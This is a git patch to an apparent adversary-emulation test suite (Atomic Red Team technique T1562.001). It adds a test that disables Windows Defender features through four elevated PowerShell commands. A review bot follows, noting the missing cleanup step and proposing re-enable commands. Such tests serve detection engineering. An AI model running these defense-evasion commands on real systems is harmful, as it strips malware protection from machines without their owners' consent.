From 98fb4c74af792f28736a546b2b910ff8faafbed1 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Thu, 1 Sep 2022 11:29:22 -0600
Subject: [PATCH] Disable Defender via PowerShell (#2110)

Co-authored-by: Carrie Roberts
---
 atomics/T1562.001/T1562.001.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 60c294cc..29b3a793 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -727,4 +727,21 @@ atomic_tests:
 Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
 Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
 name: powershell
+ elevation_required: true
+- name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
+ description: |
+ The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
+ Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
+ A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
+ This method will remove Defender and it's packages.
+ Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
+ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
+ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
+ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
+ name: powershell
 elevation_required: true
\ No newline at end of file
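Review bot: The new atomic (`- name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature`) has no `cleanup_command`, so once it runs the four Defender features stay disabled on the test host with nothing in the test to restore them, whereas the preceding test in this file ships Remove-ItemProperty cleanup lines (visible as the hunk's context). A `cleanup_command` under `executor` that re-enables the same four features with `Enable-WindowsOptionalFeature` and the same `-Online -NoRestart -ErrorAction Ignore` options would let the runner return the host to its prior state. The description also disagrees with the executor: it says "Remove the quiet switch if verbosity is needed" but none of the four commands passes a quiet switch, and "remove Defender and it's packages" should read "its". Since the commands as written only disable the features, "disable" is likely the more accurate verb than "remove" in that sentence — worth confirming against the cmdlet docs linked in the Reference line.
```yaml
    # … unchanged: name, description, supported_platforms, executor.command …
    cleanup_command: |-
      Enable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
      Enable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
      Enable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
      Enable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
    name: powershell
```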